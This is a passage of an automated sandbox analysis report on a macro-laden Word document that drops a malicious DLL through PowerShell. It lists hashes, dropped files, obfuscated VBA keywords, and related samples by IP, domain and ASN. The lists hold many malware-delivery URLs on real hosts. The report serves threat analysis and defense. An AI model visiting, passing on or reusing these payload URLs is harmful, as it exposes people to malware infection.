                                        • 84.232.229.24/yy5pra4h/
                                        Documento 2201 01279.docGet hashmaliciousBrowse
                                        • 84.232.229.24/6zji6l/
                                        DATI 2021.docGet hashmaliciousBrowse
                                        • 84.232.229.24/hu5n7nnlfn8qzz44/4teiln75sss0k/j8fl359hk405/rlm4iik5i1da/3l3lpmieamhaykhkk/
                                        informazioni 536-32772764.docGet hashmaliciousBrowse
                                        • 84.232.229.24/o6p3ixr1vo/0nwr6v/oxpej1lly6ntbn4xn2/x9kd6qn1qdqyq/d0lxoj4a8vrn/
                                        Meddelelse-58931636.docGet hashmaliciousBrowse
                                        • 84.232.229.24/m4mfruuzgu2ajo8qu7t/bl7ktqi5zlffcg/x8ofu4so7/loe8ts1l0p5/nzne9gz6/76ki44u754xsh/
                                        doc_2201_3608432.docGet hashmaliciousBrowse
                                        • 84.232.229.24/jcmzbwn9r7yck/wlh8myw/
                                        13-2021.docGet hashmaliciousBrowse
                                        • 84.232.229.24/g4fo4/gsc17oaf9ynv0wo/670mqqf8vrds/5wmsg3x72r/mh2sm8tbg/2jp5a8m51xtysk3vljn/
                                        MAIL-224201 277769577.docGet hashmaliciousBrowse
                                        • 84.232.229.24/nef4co7lnfc9omq/gcs3bqsea9h/by1c/ujdlxj02m6twsi0q/5qqr6ck1fl34uz4g8l/tck4x5pqu8pykii6lbl/
                                        192.169.223.13Arch_2021_717-1562532.docGet hashmaliciousBrowse
                                        • shannared.com/content/lhALeS/
                                        Notice 8283393_829.docGet hashmaliciousBrowse
                                        • shannared.com/content/lhALeS/
                                        MPbBCArHPF.exeGet hashmaliciousBrowse
                                        • www.zante2020.com/de92/?ofutZl=LJRLKBSy6grrtpsJhG02GrYQIWz0ACN12l1WS7OpcnRH7cIC7TbO0nH4HvapdKvK3MkbU2/Law==&00GP-0=Lho4HDB0q2fdJ
                                        5DY3NrVgpI.exeGet hashmaliciousBrowse
                                        • www.zante2020.com/de92/?FdC4E2D=LJRLKBSy6grrtpsJhG02GrYQIWz0ACN12l1WS7OpcnRH7cIC7TbO0nH4HvapdKvK3MkbU2/Law==&AjR=9r4L1
                                        DEBIT NOTE_ PZU000147200.exeGet hashmaliciousBrowse
                                        • www.signpartnerpro.com/6bu2/?ElS=pIawxknhA/x3iGgqSJRsJvWuUxDt6kQ0R9chtM/ozeyo8k7l8c2+ENgTAzecGlgx6T+D&Qtr=KnSlEX8p2LY
                                        SWIFT USD 354,883.00.exeGet hashmaliciousBrowse
                                        • www.signpartnerpro.com/6bu2/?DjU4Hl=gbG8jNk0zBv&YL0=pIawxknhA/x3iGgqSJRsJvWuUxDt6kQ0R9chtM/ozeyo8k7l8c2+ENgTAze2ZVQx+R2D
                                        SAWR000148651.exeGet hashmaliciousBrowse
                                        • www.signpartnerpro.com/6bu2/?u6u0=pIawxknhA/x3iGgqSJRsJvWuUxDt6kQ0R9chtM/ozeyo8k7l8c2+ENgTAze2ZVQx+R2D&9r4l2=xPJtQXiX
                                        DEBIT NOTE-1C017A.exeGet hashmaliciousBrowse
                                        • www.signpartnerpro.com/6bu2/?Cjs0=pIawxknhA/x3iGgqSJRsJvWuUxDt6kQ0R9chtM/ozeyo8k7l8c2+ENgTAzecGlgx6T+D&al4=aV50jnQxv4qp0f
                                        Unode.exeGet hashmaliciousBrowse
                                        • www.electwatman.com/gtb/?t6A8=BSvxnM/FatY3MVaHvUsc2bSEp39whkHRVvBzdyZiJhALHrd8voDBQHL8OFVR1zdRJwYw&9r4l2=xPGHVlS8
                                        http://ambiancemedicalspa.com/application/orcle.phpGet hashmaliciousBrowse
                                        • ambiancemedicalspa.com/application/favicon.ico

                                        Domains

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        shannared.comArch_2021_717-1562532.docGet hashmaliciousBrowse
                                        • 192.169.223.13
                                        Notice 8283393_829.docGet hashmaliciousBrowse
                                        • 192.169.223.13

                                        ASN

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        OVHFRWUHU95Apq3Get hashmaliciousBrowse
                                        • 46.105.5.118
                                        SecuriteInfo.com.ArtemisTrojan.dllGet hashmaliciousBrowse
                                        • 158.69.118.130
                                        SecuriteInfo.com.Generic.mg.59d4c719403b7938.dllGet hashmaliciousBrowse
                                        • 158.69.118.130
                                        SecuriteInfo.com.Generic.mg.9d9c1d19818e75cc.dllGet hashmaliciousBrowse
                                        • 158.69.118.130
                                        SecuriteInfo.com.ArtemisTrojan.dllGet hashmaliciousBrowse
                                        • 158.69.118.130
                                        SecuriteInfo.com.ArtemisTrojan.dllGet hashmaliciousBrowse
                                        • 158.69.118.130
                                        roboforex4multisetup.exeGet hashmaliciousBrowse
                                        • 139.99.148.202
                                        xDKOaCQQTQ.dllGet hashmaliciousBrowse
                                        • 158.69.118.130
                                        4bEUfowOcg.dllGet hashmaliciousBrowse
                                        • 158.69.118.130
                                        P_O INV 01262021.exeGet hashmaliciousBrowse
                                        • 51.195.53.221
                                        DHL doc.exeGet hashmaliciousBrowse
                                        • 51.195.53.221
                                        PL5CS6pwNitND2n.exeGet hashmaliciousBrowse
                                        • 51.75.130.83
                                        Arch_2021_717-1562532.docGet hashmaliciousBrowse
                                        • 51.255.203.164
                                        PARTS REQUEST SO_30005141.exeGet hashmaliciousBrowse
                                        • 66.70.204.222
                                        Document_PDF.exeGet hashmaliciousBrowse
                                        • 51.195.53.221
                                        SecuriteInfo.com.Variant.Zusy.363976.21086.exeGet hashmaliciousBrowse
                                        • 54.39.198.228
                                        ARCH 05 2_80074.docGet hashmaliciousBrowse
                                        • 144.217.190.240
                                        PO NO 214000070.docGet hashmaliciousBrowse
                                        • 94.23.169.237
                                        pol.docGet hashmaliciousBrowse
                                        • 94.23.169.237
                                        RFQ 20210125.docGet hashmaliciousBrowse
                                        • 94.23.169.237
                                        RCS-RDS73-75DrStaicoviciROArch_2021_717-1562532.docGet hashmaliciousBrowse
                                        • 84.232.229.24
                                        bin.shGet hashmaliciousBrowse
                                        • 5.14.105.137
                                        Notice 8283393_829.docGet hashmaliciousBrowse
                                        • 84.232.229.24
                                        MENSAJE.docGet hashmaliciousBrowse
                                        • 84.232.229.24
                                        MENSAJE.docGet hashmaliciousBrowse
                                        • 84.232.229.24
                                        MES-2021_01_22-3943960.docGet hashmaliciousBrowse
                                        • 84.232.229.24
                                        Documento 2201 01279.docGet hashmaliciousBrowse
                                        • 84.232.229.24
                                        DATI 2021.docGet hashmaliciousBrowse
                                        • 84.232.229.24
                                        informazioni 536-32772764.docGet hashmaliciousBrowse
                                        • 84.232.229.24
                                        Meddelelse-58931636.docGet hashmaliciousBrowse
                                        • 84.232.229.24
                                        doc_2201_3608432.docGet hashmaliciousBrowse
                                        • 84.232.229.24
                                        13-2021.docGet hashmaliciousBrowse
                                        • 84.232.229.24
                                        MAIL-224201 277769577.docGet hashmaliciousBrowse
                                        • 84.232.229.24
                                        Arch_05_222-3139.docGet hashmaliciousBrowse
                                        • 5.2.136.90
                                        MENSAJE 2021.docGet hashmaliciousBrowse
                                        • 5.2.136.90
                                        Documento_0501_012021.docGet hashmaliciousBrowse
                                        • 5.2.136.90
                                        Datos_019_9251.docGet hashmaliciousBrowse
                                        • 5.2.136.90
                                        document_84237-299265042.docGet hashmaliciousBrowse
                                        • 5.2.136.90
                                        ARCH-012021-21-1934.docGet hashmaliciousBrowse
                                        • 5.2.136.90
                                        Mensaje K-158701.docGet hashmaliciousBrowse
                                        • 5.2.136.90
                                        AS-26496-GO-DADDY-COM-LLCUSInformacion.docGet hashmaliciousBrowse
                                        • 166.62.10.32
                                        v07PSzmSp9.exeGet hashmaliciousBrowse
                                        • 198.71.232.3
                                        winlog(1).exeGet hashmaliciousBrowse
                                        • 184.168.131.241
                                        win32.exeGet hashmaliciousBrowse
                                        • 184.168.131.241
                                        DAT.docGet hashmaliciousBrowse
                                        • 107.180.12.39
                                        order pdf.exeGet hashmaliciousBrowse
                                        • 184.168.131.241
                                        Arch_2021_717-1562532.docGet hashmaliciousBrowse
                                        • 192.169.223.13
                                        ARCH_98_24301.docGet hashmaliciousBrowse
                                        • 198.71.233.150
                                        RFQ.xlsxGet hashmaliciousBrowse
                                        • 198.71.232.3
                                        bgJPIZIYby.exeGet hashmaliciousBrowse
                                        • 184.168.131.241
                                        E4Q30tDEB9.exeGet hashmaliciousBrowse
                                        • 192.169.220.85
                                        RevisedPO.24488_pdf.exeGet hashmaliciousBrowse
                                        • 107.180.34.198
                                        02131.docGet hashmaliciousBrowse
                                        • 166.62.28.133
                                        mensaje_012021_1-538086.docGet hashmaliciousBrowse
                                        • 198.71.233.47
                                        Notice 8283393_829.docGet hashmaliciousBrowse
                                        • 192.169.223.13
                                        message_zdm.htmlGet hashmaliciousBrowse
                                        • 184.168.131.241
                                        SAMSUNG C&T UPCOMING PROJECTS19-027-MP-010203.exe.exeGet hashmaliciousBrowse
                                        • 107.180.25.166
                                        79a2gzs3gkk.docGet hashmaliciousBrowse
                                        • 166.62.10.32
                                        message_zdm.htmlGet hashmaliciousBrowse
                                        • 184.168.131.241
                                        INFO.docGet hashmaliciousBrowse
                                        • 166.62.10.32
                                        ONEANDONE-ASBrauerstrasse48DEjustifiI_0000445990_0009334372_1005_2555517182_30092019_E.WsFGet hashmaliciousBrowse
                                        • 82.223.25.82
                                        JUSTF2.tarGet hashmaliciousBrowse
                                        • 213.165.67.118
                                        NEW ORDER.xlsxGet hashmaliciousBrowse
                                        • 74.208.236.196
                                        file.docGet hashmaliciousBrowse
                                        • 212.227.200.73
                                        winlog(1).exeGet hashmaliciousBrowse
                                        • 74.208.236.196
                                        Quote Requirements.gz.exeGet hashmaliciousBrowse
                                        • 70.35.203.53
                                        RFQ.xlsxGet hashmaliciousBrowse
                                        • 70.35.203.53
                                        Arch_2021_717-1562532.docGet hashmaliciousBrowse
                                        • 217.160.169.110
                                        Bestellung.docGet hashmaliciousBrowse
                                        • 212.227.200.73
                                        N00048481397007.docGet hashmaliciousBrowse
                                        • 212.227.200.73
                                        N00048481397007.docGet hashmaliciousBrowse
                                        • 212.227.200.73
                                        MENSAJE.docGet hashmaliciousBrowse
                                        • 212.227.200.73
                                        MENSAJE.docGet hashmaliciousBrowse
                                        • 212.227.200.73
                                        Archivo_AB-96114571.docGet hashmaliciousBrowse
                                        • 212.227.200.73
                                        5390080_2021_1-259043.docGet hashmaliciousBrowse
                                        • 212.227.200.73
                                        5390080_2021_1-259043.docGet hashmaliciousBrowse
                                        • 212.227.200.73
                                        GV52H7XsQ2.exeGet hashmaliciousBrowse
                                        • 217.76.142.246
                                        Shipping Document PL&BL Draft.exeGet hashmaliciousBrowse
                                        • 74.208.236.161
                                        13-2021.docGet hashmaliciousBrowse
                                        • 88.208.252.128
                                        mallware.exeGet hashmaliciousBrowse
                                        • 212.227.15.142
                                        AKIWIFIAKIWIFIESb6TR6I8A8W.exeGet hashmaliciousBrowse
                                        • 185.183.16.47

                                        JA3 Fingerprints

                                        No context

                                        Dropped Files

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        C:\Users\user\Kaktksw\An6othh\N49I.dllArch_2021_717-1562532.docGet hashmaliciousBrowse

                                          Created / dropped Files

                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D51ADA38-B04E-4308-BA86-6463BC7125FE}.tmp
                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):1536
                                          Entropy (8bit):1.3554734412254814
                                          Encrypted:false
                                          SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbJ:IiiiiiiiiifdLloZQc8++lsJe1Mzq
                                          MD5:889FF7B467168A53D30DCF248A7DD694
                                          SHA1:03DAC36C5B9110C3EA375EF7B8E015BEB3C1DF0D
                                          SHA-256:4A6F10669F37499EF0C305D42D22F271DE5D958D514E2607889A474FE3D9E8AF
                                          SHA-512:73E90BD8869E1C1185D692AFE446ADC75B2BE75FB532CE0E555EF1ADFD2555DAA7AAD740E4DB72C0BE2C61DBD0CDB1D43120ADE8BB8BDB407B58AC6B14E3A90D
                                          Malicious:false
                                          Reputation:low
                                          Preview: ..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F5248432-B174-499E-B3BD-E7523F18DF93}.tmp
                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):1024
                                          Entropy (8bit):0.05390218305374581
                                          Encrypted:false
                                          SSDEEP:3:ol3lYdn:4Wn
                                          MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                          SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                          SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                          SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                          Malicious:false
                                          Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\ARCH_25_012021.LNK
                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:13 2020, mtime=Wed Aug 26 14:08:13 2020, atime=Wed Jan 27 07:09:33 2021, length=175616, window=hide
                                          Category:dropped
                                          Size (bytes):2068
                                          Entropy (8bit):4.509586304702067
                                          Encrypted:false
                                          SSDEEP:48:8qqk/XT3Ik4RG3H0Qh2qqk/XT3Ik4RG3H0Q/:8qqk/XLIk4i0Qh2qqk/XLIk4i0Q/
                                          MD5:B51BD5888A718D41D4CD2F7F2B8103D3
                                          SHA1:DEEACC8F0F8827D8B6DC5005EAFFA873C909CC11
                                          SHA-256:4D9F202ABB4879D467C3609EBDAD6116A8FAFA230120DED70D35E1103B5C5714
                                          SHA-512:5E1336CE7DE5159C89C14310FA47996694F03C12770D3C1AE3DBD26BE916804C1902F29F2ABFF66C962AFE3007B64372FE2385401ACAB2403479F2B825E11BC6
                                          Malicious:false
                                          Preview: L..................F.... ....D..{...D..{.....................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....n.2.....;R1A .ARCH_2~1.DOC..R.......Q.y.Q.y*...8.....................A.R.C.H._.2.5._.0.1.2.0.2.1...d.o.c.......|...............-...8...[............?J......C:\Users\..#...................\\971342\Users.user\Desktop\ARCH_25_012021.doc.).....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.A.R.C.H._.2.5._.0.1.2.0.2.1...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......971342..........D_....3N...W...9F.C...........[D_
                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):80
                                          Entropy (8bit):4.211348644823317
                                          Encrypted:false
                                          SSDEEP:3:M1+qbl8WdblmX1+qblv:M4qbrdbPqb1
                                          MD5:EF242110122D8695A53B38974D63C306
                                          SHA1:F74EF8F7E90EF2B664F03FC482D2F1526159AC48
                                          SHA-256:320FBB51CEDFAE2FA1371AAD0622E8A5333C66EBE13A89A21B19789A0739B236
                                          SHA-512:B2AE3AEC71C0575957AA19EC1A9BE9DE587D7E3DF8345129972B98873B028512FE1CA0C31893FB589ACC12235CBA451563E66B6B2AFD00908074C4D0C79C7C8A
                                          Malicious:false
                                          Preview: [doc]..ARCH_25_012021.LNK=0..ARCH_25_012021.LNK=0..[doc]..ARCH_25_012021.LNK=0..
                                          C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):162
                                          Entropy (8bit):2.431160061181642
                                          Encrypted:false
                                          SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                                          MD5:39EB3053A717C25AF84D576F6B2EBDD2
                                          SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                                          SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                                          SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                                          Malicious:false
                                          Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...
                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HGZZKPEW76Z29NVBJ16Y.temp
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):8016
                                          Entropy (8bit):3.5815598878092376
                                          Encrypted:false
                                          SSDEEP:96:chQCsMqbqvsqvJCwo6z8hQCsMqbqvsEHyqvJCworUzkCYkHhf8RqlUV4Iu:cy+o6z8yWHnorUzkwf8R+Iu
                                          MD5:495C21C9F44F74A23210A1F8B666074A
                                          SHA1:BADCFBEE9A435173F7564DF70C8C806ADD89EB0C
                                          SHA-256:461F1E4BB3FED6EA8A0B1BC71BD4A520C16BACC99ED580A39ADB55D8EB321C42
                                          SHA-512:9BC7AC57EB9C9A06FCE015C6D49A7864F9030BDFBAFA7C2558ED7249287B2ACA5D605528826E23E0B6993FFDA1E967C0A1F461E2D45A866D21A1DB94BB297553
                                          Malicious:false
                                          Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                          C:\Users\user\Desktop\~$CH_25_012021.doc
                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):162
                                          Entropy (8bit):2.431160061181642
                                          Encrypted:false
                                          SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                                          MD5:39EB3053A717C25AF84D576F6B2EBDD2
                                          SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                                          SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                                          SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                                          Malicious:false
                                          Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...
                                          C:\Users\user\Kaktksw\An6othh\N49I.dll
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):631808
                                          Entropy (8bit):6.9127096471964675
                                          Encrypted:false
                                          SSDEEP:12288:OYzchQVZnkmt/70MWugxPJZFpf0c1pH/bdJ8CA88fzsBsI3+Dc:B4KV5Hpt8bZHLp+CSfasO+
                                          MD5:E09F65C1A92653035B27E603980CB205
                                          SHA1:78DCA7A2190C82DC8DC4A0EAC302379804C79AA9
                                          SHA-256:D09BACE1490F6EE322262FF2DA373E861F3B3B9BC03C386CE8A031648F1EAA4F
                                          SHA-512:5D55BC984F6A044877912CBE0BA40DE0210CF25C7E4FB32CBE6DB9D5C60306280CD5EC84DF1674024CA89AD67FA49F7AA55CF5BCEAE458D90CE6D86CF209D8D3
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          • Antivirus: ReversingLabs, Detection: 55%
                                          Joe Sandbox View:
                                          • Filename: Arch_2021_717-1562532.doc, Detection: malicious, Browse
                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................0...p.......>.......@....@..........................................................................p..."...............................n..................................................................................CODE.............0.................. ..`DATA.........@.......4..............@...BSS..........`.......J...................idata..."...p...$...J..............@....reloc...n.......p...n..............@..P.rsrc...............................@..P....................................@..P........................................................................................................................................................................................................................

                                          Static File Info

                                          General

                                          File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Title: Tenetur alias aut sint sequi facilis., Author: Sebastian Melgar, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Jan 25 09:28:00 2021, Last Saved Time/Date: Mon Jan 25 09:28:00 2021, Number of Pages: 1, Number of Words: 5622, Number of Characters: 32047, Security: 8
                                          Entropy (8bit):6.658685583484107
                                          TrID:
                                          • Microsoft Word document (32009/1) 79.99%
                                          • Generic OLE2 / Multistream Compound File (8008/1) 20.01%
                                          File name:ARCH_25_012021.doc
                                          File size:175104
                                          MD5:baedc37e68b58765fa52c73d0fd2c2d5
                                          SHA1:2131d1319b5de532638d34f1e3bf68337b6099bf
                                          SHA256:94485b3ce47d4a2df6dba8e888ca7a360763f7edd5a0448552d1d06b6e4f4baa
                                          SHA512:d0043f410e6b5aeb4aa07d331dcfb00977ee90471b5196a5d1431ddb3a5221f42546d9ed895c5b98ca649662468632289ccea2ec1ec5fda4269bb100414ad287
                                          SSDEEP:1536:OJlTNVRcrrMUXyaJBsc3txOOgvWJVTjxo4Iri1R1ffFkBnyAZ:+TdcrrXyQBsc0vWJVi4IrwVSBH
                                          File Content Preview:........................>................................... ..................................................................................................................................................................................................

                                          File Icon

                                          Icon Hash:e4eea2aaa4b4b4a4

                                          Static OLE Info

                                          General

                                          Document Type:OLE
                                          Number of OLE Files:1

                                          OLE File "ARCH_25_012021.doc"

                                          Indicators

                                          Has Summary Info:True
                                          Application Name:Microsoft Office Word
                                          Encrypted Document:False
                                          Contains Word Document Stream:True
                                          Contains Workbook/Book Stream:False
                                          Contains PowerPoint Document Stream:False
                                          Contains Visio Document Stream:False
                                          Contains ObjectPool Stream:
                                          Flash Objects Count:
                                          Contains VBA Macros:True

                                          Summary

                                          Code Page:1252
                                          Title:Tenetur alias aut sint sequi facilis.
                                          Subject:
                                          Author:Sebastian Melgar
                                          Keywords:
                                          Comments:
                                          Template:
                                          Last Saved By:
                                          Revion Number:1
                                          Total Edit Time:0
                                          Create Time:2021-01-25 09:28:00
                                          Last Saved Time:2021-01-25 09:28:00
                                          Number of Pages:1
                                          Number of Words:5622
                                          Number of Characters:32047
                                          Creating Application:Microsoft Office Word
                                          Security:8

                                          Document Summary

                                          Document Code Page:-535
                                          Number of Lines:267
                                          Number of Paragraphs:75
                                          Thumbnail Scaling Desired:False
                                          Company:Orta S.L.
                                          Contains Dirty Links:False
                                          Shared Document:False
                                          Changed Hyperlinks:False
                                          Application Version:917504

                                          Streams with VBA

                                          VBA File Name: A5ate73kc6cw5njy, Stream Size: 1173
                                          General
                                          Stream Path:Macros/VBA/A5ate73kc6cw5njy
                                          VBA File Name:A5ate73kc6cw5njy
                                          Stream Size:1173
                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . n < . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                          Data Raw:01 16 01 00 00 f0 00 00 00 04 03 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff 0b 03 00 00 9b 03 00 00 00 00 00 00 01 00 00 00 de 6e 3c 87 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                          VBA Code Keywords

                                          Keyword
                                          False
                                          Private
                                          VB_Exposed
                                          Attribute
                                          VB_Name
                                          VB_Creatable
                                          Document_open()
                                          VB_PredeclaredId
                                          VB_GlobalNameSpace
                                          VB_Base
                                          VB_Customizable
                                          VB_TemplateDerived
                                          VBA Code
                                          VBA File Name: Gusca95luq_, Stream Size: 14646
                                          General
                                          Stream Path:Macros/VBA/Gusca95luq_
                                          VBA File Name:Gusca95luq_
                                          Stream Size:14646
                                          Data ASCII:. . . . . . . . . d . . . . . . . . . . . . . . . l . . . . , . . . . . . . . . . . n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                          Data Raw:01 16 01 00 00 f0 00 00 00 64 10 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 6c 10 00 00 1c 2c 00 00 00 00 00 00 01 00 00 00 de 6e b6 8e 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                          VBA Code Keywords

                                          Keyword
                                          uldHRAc
                                          BJMbZuJRF
                                          xBaZq)
                                          Const
                                          BvPhx
                                          PTpduh
                                          prhgQCFm
                                          Error
                                          Split(urqwC,
                                          IKEyYJ
                                          cHCfACCC()
                                          fsCkG
                                          ndrons
                                          Split(HYqcb,
                                          Split(fsCkG,
                                          lHXavB
                                          DunxEHX
                                          Split(sHhQm,
                                          WPKmFe
                                          ixJTYF
                                          dFuMF
                                          RcxFVMDOH()
                                          vEmIAMH
                                          BvPhx)
                                          RcxFVMDOH
                                          clPKFBjz
                                          SzdUE
                                          HIXwxDo
                                          urqwC
                                          BJMbZuJRF)
                                          LnRqcjdHC
                                          lhhIDAA)
                                          mnSyJHAv()
                                          JaknVR)
                                          Split(WPKmFe,
                                          JtcSFJR()
                                          xBaZq
                                          AQJEzpnoG
                                          mxkikw
                                          Array((qtNpWFzCE),
                                          SVfwH)
                                          DObDSSSH
                                          "ndpns
                                          kWUSef
                                          mnSyJHAv
                                          IkIlHED)
                                          yNpnD
                                          riWqFGJY
                                          pqwm,
                                          lrUBAA
                                          TjMQdBBgE
                                          ZJSnRBDm)
                                          espWEuWIh
                                          JjJbB
                                          sHhQm
                                          OOobG
                                          OOobG()
                                          CNUcG
                                          Split(nvNjhAFA,
                                          Array((eBzEFGPxh),
                                          uZukAmEA
                                          qtNpWFzCE
                                          Array((KAAmsFJLa),
                                          Range:
                                          eGHABDHYI
                                          Array((LpCFBdE),
                                          "*high*,*critic*"
                                          WzIrJQJ
                                          tWLOCW
                                          Array((yNpnD),
                                          xjjUNmJ
                                          WiAHIOige
                                          vEmIAMH:
                                          VHxfT
                                          kXidGGmrk()
                                          DGpFCB
                                          mjbBYHhbs
                                          wJdJAI)
                                          Array((dvuZzGDnA),
                                          Split(DSEaFYQ,
                                          DGpFCB()
                                          Split(rSrZBJJv,
                                          otHyDQA
                                          ZJSnRBDm
                                          String
                                          sujuoHFCJ
                                          YtjFBe:
                                          aACrBzCHd
                                          PEoELvIQJ()
                                          Array((cyDODgZgJ),
